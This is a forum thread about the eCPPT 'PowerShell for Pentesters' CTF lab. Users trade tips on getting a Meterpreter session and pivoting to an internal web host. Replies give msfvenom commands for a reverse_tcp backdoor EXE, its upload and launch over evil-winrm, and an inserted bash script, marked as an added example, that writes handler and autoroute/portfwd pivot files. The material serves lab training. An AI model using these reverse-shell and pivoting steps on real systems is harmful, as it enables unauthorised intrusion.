eCPPT - Powershell for Pentesters CTF 1

Hi Everyone,

I am currently working on the eCPPT - PowerShell for Pentesters CTF 1 and have successfully obtained the first two flags. However, I am encountering difficulties with the third task.

So far, I have utilized the evil-winrm tool to gain a shell on the victim machine. The objective of Task 3 is as follows:

Identify a misconfigured resource on web.prod.local. A sensitive resource on web.prod.local has misconfigured permissions and is not directly accessible from Kali. Locate the third flag within this resource.

I attempted to craft a Meterpreter payload using msfvenom intending to establish a session that would allow me to pivot to the web.prod.local machine. I generated a .ps1 payload and uploaded it to the victim system via evil-winrm.
I tested both reverse_https and reverse_tcp payloads but nothing works.

Can anyone help me please ?

Hi, to get a Meterpreter session on the server.prod.local machine, you can do the following:

  1. Create a backdoor .exe with MSFVenom:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=yourIP LPORT=1234 -f exe -o shell.exe

  2. Set up a handler to listen.

  3. From the session opened with Evil-Winrm:
    upload shell.exe
    Start-Process "shell.exe"

This way, you should get a Meterpreter session that will allow you to perform pivoting to continue.
Warning: this lab has a lot of issues; most of the time it doesn’t even work if you do everything correctly.
Don’t spend too much time on it.

Hi, I did the same but it did not work. I will try it again.

However, thank you so much for your answer and clear explanation.

Since you do not have a browser on server.prod, you will need to forward traffic from web.prod through server.prod to your Kali Linux. Use the techniques in the training videos. The videos have a very clear step by step on how to use autoroute and other exploits.

Then, open your browser, put in the IP of web.prod and add /flag3.txt. Voilà! You have it!
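The procedure from the two replies above (x64 Meterpreter EXE, handler, then autoroute plus a port forward so web.prod can be reached from Kali) as one added example; this is not code from the original thread or from the lab. Every IP, subnet, port and file name is a placeholder assumption, and the session ID is assumed to be 1. The script only writes the Kali-side artifacts: the msfvenom command, a handler resource file, and a pivot resource file built on msfconsole's `sessions -C` (run a Meterpreter command on a given session) and the `autoroute` / `portfwd` Meterpreter commands.

```shell
#!/usr/bin/env bash
# Added example, not code from the original thread. Builds the Kali-side pieces for
# the procedure above: the msfvenom command (x64, matching the target, as the later
# reply notes), a multi/handler resource file, and a second resource file that adds a
# route and a port forward through the Meterpreter session so web.prod.local's HTTP
# port can be browsed from Kali. Every IP, subnet and port below is a placeholder.

# Command to generate the backdoor EXE. Arch is fixed to x64 here; confirm it on the
# target first with the PowerShell one-liner returned by target_arch_check().
gen_payload_cmd() {  # args: LHOST LPORT OUTFILE
  printf 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe -o %s\n' "$1" "$2" "$3"
}

# PowerShell one-liner to run inside the evil-winrm shell before picking the payload arch.
target_arch_check() {
  printf '%s\n' '[Environment]::Is64BitOperatingSystem'
}

# Handler resource file: start the listener as a background job (exploit -j) and keep
# it listening after the first session (ExitOnSession false) so a retry does not need
# a new handler.
write_handler_rc() {  # args: LHOST LPORT OUTFILE
  cat > "$3" <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j
EOF
}

# Pivot resource file, to be run once the session is up ("resource pivot.rc" in
# msfconsole): route the internal subnet through the session, then forward a local
# port to web.prod.local:80 so a browser on Kali can use http://127.0.0.1:LOCAL_PORT/.
write_pivot_rc() {  # args: SESSION_ID INTERNAL_SUBNET_CIDR WEBPROD_IP LOCAL_PORT OUTFILE
  cat > "$5" <<EOF
sessions -C "run autoroute -s $2" -i $1
sessions -C "portfwd add -l $4 -p 80 -r $3" -i $1
route print
EOF
}

# Usage with placeholder values (assumptions; adjust to the lab):
#   gen_payload_cmd 10.10.10.5 1234 shell.exe            # run the printed command on Kali
#   write_handler_rc 10.10.10.5 1234 handler.rc          # msfconsole -r handler.rc
#   # in evil-winrm: upload shell.exe ; Start-Process "shell.exe"
#   write_pivot_rc 1 172.16.0.0/24 172.16.0.20 8080 pivot.rc   # after session 1 opens
#   # then browse http://127.0.0.1:8080/flag3.txt from Kali
```

The port forward is the simplest way to get one HTTP resource in front of a Kali browser; if more than one host or port on the internal network needs browsing, the same route can instead back `auxiliary/server/socks_proxy` with proxychains, which is what the training videos cover.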

I'm stuck on the same flag. Did you manage to get it?
Thanks

NO SPOILER: so basically @Ski2per_Sec was right, but remember to create the payload with the same arch as the system (x64).
